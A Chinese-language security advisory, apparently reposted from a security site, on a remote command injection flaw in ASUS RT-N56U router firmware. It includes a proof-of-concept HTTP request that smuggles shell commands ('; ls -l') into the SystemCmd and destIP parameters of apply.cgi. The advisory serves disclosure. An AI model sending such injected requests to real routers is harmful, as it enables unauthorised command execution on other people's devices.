N56U Router远程命令注入漏洞

发布日期:2013-06-07
更新日期:2013-06-14

受影响系统:
Asus RT-N56U 3.0.0.4.360
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60431
 
ASUS RT-N56U是无线宽带路由器。
 
ASUS RT-N56U 3.0.0.4.360及之前版本对输入过滤不严,存在远程shell命令注入漏洞,成功利用后可使攻击者在受影响设备上下文中上传和执行任意命令。
 
<*来源:drone
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET /apply.cgi?current_page=Main_Analysis_Content.asp&amp;amp;next_page=Main_Analysis_Content.asp&amp;amp;next_host=www.example3.com&amp;amp;group_id=&amp;amp;modified=0&amp;amp;action_mode=+Refresh+&amp;amp;action_script=&amp;amp;action_wait=&amp;amp;first_time=&amp;amp;preferred_lang=EN&amp;amp;SystemCmd=ping+-c+5+%3B+ls+-l&amp;amp;firmver=3.0.0.4&amp;amp;cmdMethod=ping&amp;amp;destIP=%3B+ls+-l+.%2Fuser%2Fcgi-bin%2F&amp;amp;pingCNT=5 HTTP/1.1
 Host:
 Proxy-Connection: keep-alive
 Authorization: Basic ZGVmYXVsdA==
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
 Referer:
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: en-US,en;q=0.8

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Asus
 ----
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/psyzp.html